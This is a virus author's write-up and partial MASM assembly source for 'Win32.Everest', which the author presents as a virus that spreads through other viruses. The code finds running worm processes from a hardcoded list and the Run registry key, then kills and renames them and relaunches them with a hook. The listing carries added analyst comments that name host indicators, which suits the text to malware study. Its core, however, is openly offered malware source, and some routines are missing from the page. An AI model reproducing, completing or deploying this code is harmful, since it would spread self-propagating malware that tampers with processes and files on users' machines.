 Win32.Everest
                 by pkxp/CVC
                  
 lemme introduce my Everest virus, the world's first virus 
which spreads via other viruses. The idea came to my head when 
I was thinking about viruses in 2003. The virus itself is not 
big, and it's not complicated; I coded it just to show something new.

Technical details:
 1. find a known virus 
 2. kill and move it
 3. run it in suspended mode and hook its GetModuleFileNameA
 4. resume it
 5. if there are no more known viruses, continue; else jump to 1
 6. read data from HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
 7. repeat 1,2,3,4,5
 8. sleep , then jump 1
 So when those viruses spread, what they are spreading is my Everest instead!
                                                  pkxp / CVC
                                    

.386                                    ; MASM (Intel syntax), 32-bit x86, flat model, stdcall: Win32 PE target
.model  flat,stdcall 
option  casemap:none                    ; identifiers are case-sensitive
include useful.inc                      ; project include, not shown: @pushsz macro and API prototypes;
                                        ; the globals szWormPath/szWinPath/szSysPath/pMem/tmp used below
                                        ; are declared elsewhere (this include or page 2 of the listing)
 
.code
;--------------------------------------------------------------
; main: entry point.  Analysis notes (ReadRunKey, StartVirus,
; RaisePrivileges and GetAPIz are not on this page).
;   1. Named mutex 'Everest' as a single-instance guard; a second
;      instance goes to ExitVirus and calls ExitProcess(1).
;   2. Forever: walk the built-in list (FixedVirus) with the Windows
;      directory + '\' prepended, sleep 30 min, walk the names that
;      ReadRunKey copies into a 4 KiB VirtualAlloc'd buffer (no
;      prefix), sleep 15 min, repeat.
; Host indicators visible here: the mutex name 'Everest' and the two
; Sleep intervals.  Process/file behaviour is in PatchAllVirus,
; OpenNT4_2k_xp_2003Virus and PatchVirus.
;--------------------------------------------------------------
main:        
       @pushsz  'Everest'               ; lpName (@pushsz: macro from useful.inc, used as a string-pointer argument throughout)
       push     FALSE                   ; bInitialOwner
       push     NULL                    ; lpMutexAttributes
       call     CreateMutex             ; CreateMutex(NULL, FALSE, "Everest")
       call     GetLastError            
       cmp      eax , ERROR_ALREADY_EXISTS
       jz       ExitVirus               ; another instance already holds the mutex -> quit
       call     EverestInit             ; own path, Windows/System dirs, privileges, API pointers

PatchFixedVirus:        
       mov      pMem , NULL             ; pMem == 0 makes PatchAllVirus read each handler from the list (lodsd there)
       @pushsz  '\'                     ; szPrefix2
       push     offset  szWinPath       ; szPrefix (filled in by EverestInit)
       push     offset  FixedVirus      ; szVirusList: {asciiz name, dd handler}..., 0
call     PatchAllVirus                   ; PatchAllVirus(FixedVirus, szWinPath, "\")
push     1000*60*30                      ; 30 minutes
call     Sleep
PatchRegRunVirus:
       Invoke   VirtualAlloc,0,4096,MEM_RESERVE or MEM_COMMIT,PAGE_READWRITE
       or       eax , eax
       jz       MainSleep               ; allocation failed: skip the Run-key pass this round
       mov      pMem , eax              ; pMem != 0 makes PatchAllVirus use PatchVirus for every name

       call     ReadRunKey            ;read data from run to pMem (body not on this page; the header text names HKLM\Software\Microsoft\Windows\CurrentVersion\Run)
       push     NULL                    ; szPrefix2
       push     NULL                    ; szPrefix
       push     pMem                    ; szVirusList = names read from the Run key
       call     PatchAllVirus         ;no prefix
       
       push     MEM_RELEASE 
       push     0 
       push     pMem
       call     VirtualFree          
MainSleep:
push     1000*60*15                      ; 15 minutes
call     Sleep
jmp      PatchFixedVirus                 ; loops forever; ExitVirus is reached only from the mutex check
ExitVirus:
       push     1
       call     ExitProcess             ; ExitProcess(1)

;--------------------------------------------------------------
;--------------------------------------------------------------
; EverestInit: one-time setup called from main.
;   szWormPath <- own module path (OpenNT4_2k_xp_2003Virus compares
;                 against it so this process is never a target)
;   szWinPath  <- Windows directory, szSysPath <- System directory
;   then RaisePrivileges and GetAPIz (neither is on this page; the
;   12345678h placeholders in OpenNT4_2k_xp_2003Virus are presumably
;   what GetAPIz patches -- TODO confirm on page 2).
; No registers are saved here.
;--------------------------------------------------------------
EverestInit:        
       push MAX_PATH                    ; nSize
push     offset szWormPath              ; lpFilename
push 0                                  ; hModule = NULL -> the running executable
call     GetModuleFileNameA             ; szWormPath = full path of this image

push 50                                 ; uSize: 50-byte buffers (declarations not on this page)
push offset szWinPath       
call GetWindowsDirectoryA

push 50
push offset szSysPath       
call GetSystemDirectoryA
call     RaisePrivileges                ; off-page
call     GetAPIz                        ; off-page
       ret
       
;---------------------------------------------------------------
;---------------------------------------------------------------
; PatchAllVirus(szVirusList, szPrefix, szPrefix2)  -- stdcall, ret 12
; Walks a list of entries and hands each to a handler.
;   szVirusList : sequence of asciiz names.  When the global pMem == 0
;                 each name is followed by a dd handler address (the
;                 FixedVirus layout); otherwise the handler is always
;                 PatchVirus (Run-key data carries no handler field).
;                 A 0 byte where a name would start ends the list.
;   szPrefix, szPrefix2 : prepended via wsprintf("%s%s%s"), giving
;                 "<szPrefix><szPrefix2><name>"; both NULL on the Run-key pass.
; Per entry: formatted path -> formatVirus (strip " args") ->
;   OpenNT4_2k_xp_2003Virus (handle of a running process whose first
;   module has that path, or 0) -> handler(hProcess, szVirusPath).
; Clobbers esi, edi, eax; unlike the other PROCs here there is no pushad.
;---------------------------------------------------------------
PatchAllVirus   PROC   szVirusList : DWORD , szPrefix : DWORD , szPrefix2 : DWORD
       LOCAL   hProcess           : DWORD
       LOCAL   szVirusPath[128]   : BYTE            ; wsprintf target; no length limit is applied
       LOCAL   szformatedPath[128]: BYTE
       
       mov     esi , szVirusList               ; esi walks the list
       lea     edi , szVirusPath               ; edi = formatted "<prefix><prefix2><name>"
PAVLoop:         
       push    esi                             ; %s #3: current name
       push    szPrefix2                       ; %s #2
       push    szPrefix                        ; %s #1
       @pushsz '%s%s%s'
       push    edi
       call    wsprintf    
       add     esp , 20                        ; cdecl: 5 dword args

       mov     al , byte ptr[edi]
       or      al , al
       jz      PAVExit                         ; empty result (no prefixes and an empty list) -> done

       lea     eax , szformatedPath
       push    eax
       push    edi
       call    formatVirus                     ; szformatedPath = path part only (up to the first space)
                                           
       lea     eax , szformatedPath
       push    eax     
       call    OpenNT4_2k_xp_2003Virus         ; PROCESS_ALL_ACCESS handle of a matching process, or 0
       mov     hProcess , eax 
       
PAVNextName:
       lodsb                                   ; advance esi past the name's terminating NUL
       or      al , al
       jnz     PAVNextName                        
       mov     eax , pMem
       .if     eax == 0
               lodsd                           ; built-in list: handler address stored after the name
       .else                  
               mov   eax , offset PatchVirus   ; Run-key data: fixed handler
       .endif 

       push    edi                             ; szVirusPath (any " args" tail still attached)
       push    hProcess       
       call    eax                             ; handler(hProcess, szVirusPath); stdcall, handler does ret 8
       
       mov     al , byte ptr[esi]
       or      al , al
       jnz     PAVLoop                         ; next entry unless the terminating 0 byte
PAVExit:       
       ret     12
PatchAllVirus   ENDP   

;------------------------------------------------------------------
;------------------------------------------------------------------
; formatVirus(pVirusName, pformatedName) -- stdcall, ret 8
; Copies pVirusName into pformatedName up to (not including) the first
; space or NUL and NUL-terminates the copy, i.e. splits "<path> <args>"
; and keeps <path>.  No bound on the destination; callers on this page
; pass 128-byte locals.  All registers preserved (pushad/popad).
;------------------------------------------------------------------
formatVirus     PROC  pVirusName:DWORD , pformatedName:DWORD
       pushad
       mov     esi , pVirusName                ; source
       mov     edi , pformatedName             ; destination
FVCopy:        
       lodsb
       cmp     al , ' '                        ; a space ends the path part
       jz      FVEndCopy
       or      al , al                         ; so does NUL
       jz      FVEndCopy        
       stosb
       jmp     FVCopy
FVEndCopy:
       xor     al , al
       stosb                                   ; terminate the copy
       popad
       ret     8
formatVirus     ENDP        

;------------------------------------------------------------------     
;------------------------------------------------------------------
; FixedVirus: the built-in target list walked by PatchAllVirus with
; szWinPath + '\' prepended.  Layout per entry: asciiz path relative to
; the Windows directory, then dd handler (consumed by lodsd when the
; global pMem == 0).  A single 0 byte ends the list.  The trailing
; comments are the author's attribution of each file name to a worm
; family.  For defenders these relative paths -- and the same names
; with ".scr" appended, see PatchVirus -- are the file-system
; indicators of this component.
;------------------------------------------------------------------
FixedVirus:                           
       db      'system32\msblast.exe',0   ;msblast
       dd      offset PatchVirus
        
       db      'Videodrv.exe',0           ;Mimail
       dd      offset PatchVirus
       
       db      'system32\runouce.exe',0   ;ChineseHack
       dd      offset PatchVirus
       
       db      'system32\gone.scr',0      
       dd      offset PatchVirus
               
       db      'system32\hfind.exe',0      ;muma
       dd      offset PatchVirus
                               
       db      'system32\scam32.exe',0     ;sircam
       dd      offset PatchVirus
       
       db      'killonce.exe',0            
       dd      offset PatchVirus
       
       db      'system32\wins\DLLHOST.exe',0
       dd      offset PatchVirus
       
       db      'system32\Ravmond.exe',0   ;Lovgate (this and the following seven entries share the attribution)
       dd      offset PatchVirus                      
       db      'system32\WinGate.exe',0       
       dd      offset PatchVirus                      
       db      'system32\WinDriver.exe',0  
       dd      offset PatchVirus              
       db      'system32\Winrpc.exe',0  
       dd      offset PatchVirus                      
       db      'system32\Winhelp.exe',0
       dd      offset PatchVirus
       db      'system32\Iexplore.exe',0  
       dd      offset PatchVirus                      
       db      'system32\NetServices.exe',0
       dd      offset PatchVirus                      
       db      'system32\winexe.exe',0
       dd      offset PatchVirus              
               
       db      'mmc.exe',0             ;nimda
       dd      offset PatchVirus
       
       db      'system32\load.exe',0 
       dd      offset PatchVirus
               
       db      'system32\wqk.exe',0     ;Klez
       dd      offset PatchVirus
       db      'system32\krn132.exe',0
       dd      offset PatchVirus     
                        
       
       db      'ParticularViruses',0      ; sentinel entry: its handler is ParticularVirus (a bare ret 8 on this page)
       dd      offset ParticularVirus
       db      0                             ;End of virus list     
       
;-------------------------------------------------------------------
;-------------------------------------------------------------------
; OpenNT4_2k_xp_2003Virus(szVirusName) -- stdcall, ret 4
; Enumerates every PID through PSAPI (EnumProcesses / EnumProcessModules /
; GetModuleFileNameEx, called through the 12345678h placeholders below,
; presumably patched in by GetAPIz -- not on this page) and returns a
; PROCESS_ALL_ACCESS handle to the first process whose first module path
; equals szVirusName (lstrcmpi, case-insensitive), or 0.  Never matches
; this program's own path (szWormPath).  Non-matching handles are closed;
; the returned one is left open for the caller (PatchVirus closes it).
; All registers preserved except eax.
; Detection note: an OpenProcess(PROCESS_ALL_ACCESS) sweep over every PID
; followed by TerminateProcess in PatchVirus is the behavioural pattern
; of this pair.
;-------------------------------------------------------------------
OpenNT4_2k_xp_2003Virus PROC szVirusName : DWORD
       LOCAL   hProcess                 : DWORD
       LOCAL   hMods                    : DWORD        
       LOCAL   szProcessName[MAX_PATH]  : BYTE             
  LOCAL   ProcessIds[128+1]        : DWORD          ; +1 slot so a zero always terminates the scan below
       
       pushad                        
       push    szVirusName        
       push    offset szWormPath
       call    lstrcmpi                        ; our own path is never a target
       jz      OVFailExit
       
       lea     esi , ProcessIds        
       push    (128+1)*4        
  push    esi
call    RtlZeroMemory                           ; ProcessIds[] = 0
push    offset tmp                              ; lpcbNeeded (tmp: global, not on this page)
push    128*4              ;*4                  ; cb: 128 PIDs
push    esi                                     ; pProcessIds
       moveax,12345678h                         ; mov eax, placeholder patched at run time (the missing space is presumably a transcription artefact of this listing)
_EnumProcesses  = dword ptr $-4                 ; names the 4 immediate bytes just emitted
call    eax                ;enumerate all running processes
dec     eax
jne     OVFailExit                              ; only a return value of exactly 1 counts as success
add     esi,4              ;esi->ProcessIds[1]: slot 0 is skipped; the PID 0 typically there would hit the zero test below
ProcessSearch:
       lodsd                      ;get PID
       or      eax , eax
       jz      OVFailExit                      ; zero slot = end of list (array was zeroed)
       
       push    eax                             ; dwProcessId
       push    FALSE                           ; bInheritHandle
       push    PROCESS_ALL_ACCESS              ; dwDesiredAccess
       call    OpenProcess
       or      eax , eax
       jz      ProcessSearch                   ; could not open: next PID
       mov     hProcess , eax

       lea     eax , hMods                
       push    offset tmp                      ; lpcbNeeded
       push    4                               ; cb: one HMODULE only
       push    eax                             ; lphModule
       push    hProcess
       mov     eax , 12345678h                 ; placeholder patched at run time
_EnumProcessModules = dword ptr $-4
       call    eax                     
       or      eax , eax
       jz      OVClose
          
       lea     edi , szProcessName
       push    MAX_PATH                        ; nSize
       push    edi                             ; lpFilename
       push    hMods                           ; hModule
       push    hProcess
       mov     eax , 12345678h                 ; placeholder patched at run time
_GetModuleFileNameEx = dword ptr $-4
       call    eax                     
       or      eax , eax
       jz      OVClose
       
IsVirus:                     
       
       push    szVirusName
       push    edi        
       call    lstrcmpi                        ; case-insensitive path compare
       jz      OVSucExit                       ; match: return the still-open handle
OVClose:                    
       push    hProcess
       call    CloseHandle                
       jmp     ProcessSearch
       
OVFailExit:  
       popad
       xor     eax , eax                       ; 0 = not found / not running
       ret     4        
OVSucExit:           
       popad              
       mov     eax , hProcess                  ; PROCESS_ALL_ACCESS handle; caller closes it
       ret     4
OpenNT4_2k_xp_2003Virus  ENDP        

;---------------------------------------------------------------
;---------------------------------------------------------------
; PatchVirus(hProcess, szVirusPath) -- stdcall, ret 8
; Default handler for a list entry.
;   hProcess    : handle from OpenNT4_2k_xp_2003Virus, or 0 if the
;                 target was not running
;   szVirusPath : "<full path>[ <args>]"
; 1. If running: TerminateProcess, wait for it to exit, close the handle.
; 2. Rename the file "<path>" to "<path>.scr" (MoveFile; result unchecked).
; 3. Hand "<path>.scr[ <args>]" to StartVirus (not on this page; per the
;    header text this is the suspended-start-and-hook step).
; File-system indicator: the original binary persists under its own
; name plus ".scr".  All registers preserved (pushad/popad).
;---------------------------------------------------------------
PatchVirus      PROC   hProcess    : DWORD , szVirusPath : DWORD
       LOCAL   szDestPath[128]    : BYTE
       LOCAL   szformatedPath[128]: BYTE
             
       pushad                                                         
       mov     eax , hProcess
       or      eax , eax
       jz      PVMoveVirus                     ; not running: skip the kill
       push    0                               ; uExitCode
       push    hProcess
       call    TerminateProcess                
       push    INFINITE
       push    hProcess
       call    WaitForSingleObject             ; block until the process has really gone (file must be free for MoveFile)
       
       push    hProcess
       call    CloseHandle   
PVMoveVirus:          
       lea     esi , szformatedPath
       push    esi
       push    szVirusPath
       call    formatVirus                     ; esi = path without the " <args>" tail
       
       lea     edi , szDestPath
       push    esi
       push    edi
       call    lstrcpy                         ; szDestPath = path

       @pushsz '.scr'
       push    edi                
       call    lstrcat                         ; szDestPath = path + ".scr"
       
       push    edi                             ; lpNewFileName
       push    esi                             ; lpExistingFileName
       call    MoveFile                        ; rename the original to "<path>.scr"; return value not checked

       push    esi
       call    lstrlen                         ; eax = strlen(path)
       
       mov     esi , szVirusPath
       add     esi , eax                       ; esi -> " <args>" tail of szVirusPath (or its NUL)
       push    esi
       push    edi
       call    lstrcat                         ; szDestPath = "<path>.scr<args tail>"

       push    edi
       call    StartVirus                      ; off-page
       popad
       ret     8
PatchVirus      ENDP                

;-------------------------------------------------------------------
;-------------------------------------------------------------------
; ParticularVirus: handler bound to the 'ParticularViruses' sentinel
; entry of FixedVirus.  On this page it only discards its two stdcall
; arguments (hProcess, szVirusPath) and returns; page 2 of the listing
; is not shown here.
;-------------------------------------------------------------------
ParticularVirus:
       ret     8                                ; no-op handler
       
;-------------------------------------------------------------------         
